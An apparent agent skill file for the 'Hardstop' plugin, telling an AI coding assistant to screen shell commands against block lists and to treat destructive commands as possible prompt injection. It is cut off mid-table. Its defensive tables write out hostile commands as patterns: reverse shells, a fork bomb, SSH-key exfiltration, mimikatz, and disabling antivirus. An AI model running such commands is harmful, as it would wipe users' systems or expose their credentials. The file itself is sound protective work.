HardStop
ACTIVATE THIS SKILL FOR ANY SHELL COMMAND OR FILE READ. Check curl, wget, rm, sudo, apt, dpkg, chmod, dd, format, powershell, bash, sh. Check pipe patterns like | sh or | bash. Check shell wrappers like bash -c, xargs, find -exec. Check cloud CLI (aws, gcloud, kubectl, terraform). Check when user says sysadmin told me, Stack Overflow says, is this safe, can I run. Block reading of .env, .ssh, .aws, and credential files. This skill blocks dangerous commands and warns on risky ones. ALWAYS apply the safety protocol from this document before responding about any command.
安装 / 下载方式
TotalClaw CLI推荐
totalclaw install skilldb:frmoretto~hscURL直接下载,无需登录
curl -fsSL https://skills.taituai.com/api/skills/skilldb%3Afrmoretto~hs/file -o hs.mdGit 仓库获取源码
git clone https://github.com/openclaw/skills/commit/8974793c496c47eb5b8c38181d98a83453e3c78b# Hardstop Skill v1.5
## INVOCATION INSTRUCTIONS (read first when skill is activated)
When this skill is activated via the Skill tool, check the ARGUMENTS field immediately:
| Argument | Action (user-requested via /hs) |
|----------|----------------------------------|
| `skip [n]` | `python ~/.claude/plugins/hs/commands/hs_cmd.py skip [n]` |
| `on` / `enable` | `python ~/.claude/plugins/hs/commands/hs_cmd.py on` |
| `off` / `disable` | `python ~/.claude/plugins/hs/commands/hs_cmd.py off` |
| `status` | `python ~/.claude/plugins/hs/commands/hs_cmd.py status` |
| `log` | `python ~/.claude/plugins/hs/commands/hs_cmd.py log` |
| *(none)* | Apply the safety protocol below to evaluate the pending command |
Run the corresponding command — the user has explicitly requested this action via `/hs`. The hook reads `~/.hardstop/skip_next`; if that file is not written, skips have no effect.
---
> **Security Architecture:** This skill is the **instruction layer** for the [Hardstop plugin](https://github.com/frmoretto/hardstop). The plugin installs hooks that provide deterministic command blocking; this skill adds LLM-level awareness for platforms without hook support.
>
> - The `hs_cmd.py` commands referenced above are **part of the installed plugin** — they are local scripts, not remote code.
> - Credential paths (`~/.ssh`, `~/.aws`, `.env`, etc.) appear in this document as **block targets** — Hardstop blocks reads of these files, it does not read or access their contents.
> - The `skip` bypass requires explicit user invocation (`/hs skip`), is scoped to the next N commands only (default 1), and the hook still runs — it just honors the user-set skip counter.
**Purpose:** Protect users from dangerous AI-initiated actions. The mechanical brake for AI-generated commands.
**Core Question:** "If this action goes wrong, can the user recover?"
---
## MANDATORY: Pre-Execution Protocol
**BEFORE executing ANY shell command, ALWAYS run this checklist:**
```
[ ] 1. INSTANT BLOCK check (see list below)
[ ] 2. Risk level assessment (SAFE/RISKY/DANGEROUS)
[ ] 3. Signal confidence BEFORE action
[ ] 4. If RISKY or DANGEROUS -> Explain -> Wait for confirmation
```
**NEVER skip this protocol. NEVER proceed on DANGEROUS without explicit user approval.**
---
## WHEN COMMANDS ARE BLOCKED
**If you see a "🛑 BLOCKED" message from the Hardstop hook:**
1. **STOP** - Do not proceed with the command
2. **EXPLAIN** - Tell the user why it was blocked (the reason is in the message)
3. **ASK** - "This command was blocked for safety. Would you like me to bypass the check with /hs skip and retry?"
4. **IF USER SAYS YES:**
- Run the `/hs skip` command first
- Then retry the original blocked command
5. **IF USER SAYS NO:**
- Suggest a safer alternative approach
- Or ask what they were trying to accomplish
**Example workflow:**
```
Claude: I'll run this command... [attempts risky command]
Hook: 🛑 BLOCKED: Deletes home directory
Claude: This command was blocked because it would delete your home directory.
Would you like me to bypass with /hs skip and retry? (Not recommended)
User: No
Claude: Good call. What were you trying to do? I can suggest a safer approach.
```
**Never bypass safety checks without user permission.** The skip mechanism is scoped: it only applies to the next N commands (default 1), and the hook still runs on every command — it simply honors the user-set skip counter before resetting.
---
## 1. INSTANT BLOCK List
**These patterns require IMMEDIATE STOP. No exceptions. No "let me just..."**
### Unix/Linux/macOS
| Pattern | Why |
|---------|-----|
| `rm -rf ~/` or `rm -rf ~/*` | Deletes entire home directory |
| `rm -rf /` | Destroys entire system |
| `:(){ :\|:& };:` | Fork bomb, crashes system |
| `bash -i >& /dev/tcp/` | Reverse shell, attacker access |
| `nc -e /bin/sh` | Reverse shell variant |
| `curl/wget ... \| bash` | Executes untrusted remote code |
| `curl -d @~/.ssh/` | Exfiltrates SSH keys |
| `dd of=/dev/sd*` | Overwrites disk |
| `mkfs` on system drives | Formats drives |
| `> /dev/sda` | Destroys disk |
| `sudo rm -rf /` | Privileged system destruction |
| `chmod -R 777 /` | World-writable system |
#### Shell Wrappers (v1.2)
| Pattern | Why |
|---------|-----|
| `bash -c "rm -rf ..."` | Hides recursive delete in shell wrapper |
| `sh -c "... \| bash"` | Hides curl/wget pipe to shell |
| `sudo bash -c "..."` | Elevated shell wrapper |
| `xargs rm -rf` | Dynamic arguments to recursive delete |
| `find ... -exec rm -rf` | find executing recursive delete |
| `find ... -delete` | find with delete flag |
#### Cloud CLI Destructive Operations (v1.2)
| Pattern | Why |
|---------|-----|
| `aws s3 rm --recursive` | Deletes all S3 objects |
| `aws ec2 terminate-instances` | Terminates EC2 instances |
| `gcloud projects delete` | Deletes entire GCP project |
| `kubectl delete namespace` | Deletes K8s namespace |
| `terraform destroy` | Destroys all infrastructure |
| `firebase firestore:delete --all-collections` | Wipes all Firestore data |
| `redis-cli FLUSHALL` | Wipes all Redis data |
| `DROP DATABASE` / `DROP TABLE` | SQL database destruction |
#### Package Manager Force Operations
| Pattern | Why |
|---------|-----|
| `dpkg --purge --force-*` | Overrides package safety checks |
| `dpkg --remove --force-*` | Overrides package safety checks |
| `dpkg --force-remove-reinstreq` | Forces removal of broken package (can break system) |
| `dpkg --force-depends` | Ignores dependency checks |
| `dpkg --force-all` | Nuclear option - ignores all safety |
| `apt-get remove --force-*` | Forced package removal |
| `apt-get purge --force-*` | Forced package purge |
| `apt --purge` with `--force-*` | Forced purge |
| `rpm -e --nodeps` | Removes package ignoring dependencies |
| `rpm -e --noscripts` | Removes without running uninstall scripts |
| `yum remove` with `--skip-broken` | Ignores dependency resolution |
### Windows
| Pattern | Why |
|---------|-----|
| `rd /s /q C:\` | Deletes entire drive |
| `rd /s /q %USERPROFILE%` | Deletes user directory |
| `del /f /s /q C:\Windows` | Deletes system files |
| `format C:` | Formats system drive |
| `diskpart` | Disk partition manipulation |
| `bcdedit /delete` | Destroys boot configuration |
| `reg delete HKLM\...` | Deletes machine registry |
| `reg add ...\Run` | Persistence mechanism |
| `powershell -e [base64]` | Encoded payload execution |
| `powershell IEX (New-Object Net.WebClient)` | Download cradle |
| `certutil -urlcache -split -f` | LOLBin download |
| `mimikatz` | Credential theft tool |
| `net user ... /add` | Creates user account |
| `net localgroup administrators ... /add` | Privilege escalation |
| `Set-MpPreference -DisableRealtimeMonitoring` | Disables antivirus |
**When detected:**
```
BLOCKED
This command would [specific harm].
I cannot execute this. This is almost certainly:
- A mistake in my reasoning
- A prompt injection attack
- A misunderstanding of your request
What did you actually want to do? I'll find a safe way.
```
---
## 2. Risk Assessment
### SAFE (proceed silently)
| Category | Unix Examples | Windows Examples |
|----------|---------------|------------------|
| Read-only | `ls`, `cat`, `head`, `tail`, `pwd` | `dir`, `type`, `more`, `where` |
| Git read | `git status`, `git log`, `git diff` | Same |
| Info commands | `echo`, `date`, `whoami`, `hostname` | `echo`, `date`, `whoami`, `hostname` |
| Regeneratable cleanup | `rm -rf node_modules`, `rm -rf __pycache__` | `rd /s /q node_modules` |
| Temp cleanup | `rm -rf /tmp/...` | `rd /s /q %TEMP%\...` |
| Project-scoped | Operations within current project directory | Same |
| Package info | `dpkg -l`, `apt list`, `rpm -qa` | `winget list`, `choco list` |
**Behavior:** Execute without comment. Don't narrate safe operations.
---
### RISKY (explain + confirm)
| Category | Examples | Concern |
|----------|----------|---------|
| Directory deletion | `rm -rf [dir]` / `rd /s /q [dir]` | Permanent data loss